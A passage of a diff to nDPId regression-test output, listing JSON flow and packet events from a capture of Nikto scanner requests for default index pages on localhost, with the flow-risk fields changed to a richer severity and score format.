+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276815,"pkt":"AAAAAAAAAAAAAAAACABFAADGtzZAAEAGhPl\/AAABfwAAAcJKH5BukY8IX6sJe4AYAED+ugAAAQEICp1m+3edZvt2R0VUIC9pbmRleC5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276817,"pkt":"AAAAAAAAAAAAAAAACABFAADGzfJAAEAGbj1\/AAABfwAAAcJMH5CEyfXFi\/ZWqoAYAED+ugAAAQEICp1m+3mdZvt5R0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
-00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"ts_msec":1576420276819,"pkt":"AAAAAAAAAAAAAAAACABFAADFj3JAAEAGrL5\/AAABfwAAAcJOH5DAfLdF0MycV4AYAED+uQAAAQEICp1m+3udZvt7R0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"ts_msec":1576420276820,"pkt":"AAAAAAAAAAAAAAAACABFAADG77xAAEAGTHN\/AAABfwAAAcJQH5DIa9eQqgE4nYAYAED+ugAAAQEICp1m+3ydZvt8R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
-00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"ts_msec":1576420276821,"pkt":"AAAAAAAAAAAAAAAACABFAADHQ2dAAEAG+Md\/AAABfwAAAcJSH5BEZHtRsCeOn4AYAED+uwAAAQEICp1m+32dZvt9R0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCg0K"}
-00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276823,"pkt":"AAAAAAAAAAAAAAAACABFAADI9WNAAEAGRsp\/AAABfwAAAcJUH5Atl81VKdEVGoAYAED+vAAAAQEICp1m+3+dZvt\/R0VUIC9kZWZhdWx0LmFzcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"ts_msec":1576420276824,"pkt":"AAAAAAAAAAAAAAAACABFAADJPphAAEAG\/ZR\/AAABfwAAAcJWH5C0BwahLC3FVoAYAED+vQAAAQEICp1m+4CdZvuAR0VUIC9kZWZhdWx0LmFzcHggSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="}
-00870{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"ts_msec":1576420276825,"pkt":"AAAAAAAAAAAAAAAACABFAADIFrxAAEAGJXJ\/AAABfwAAAcJYH5C2Ei6NIzroBYAYAED+vAAAAQEICp1m+4GdZvuBR0VUIC9kZWZhdWx0Lmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
-00869{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port","12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}}
+01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 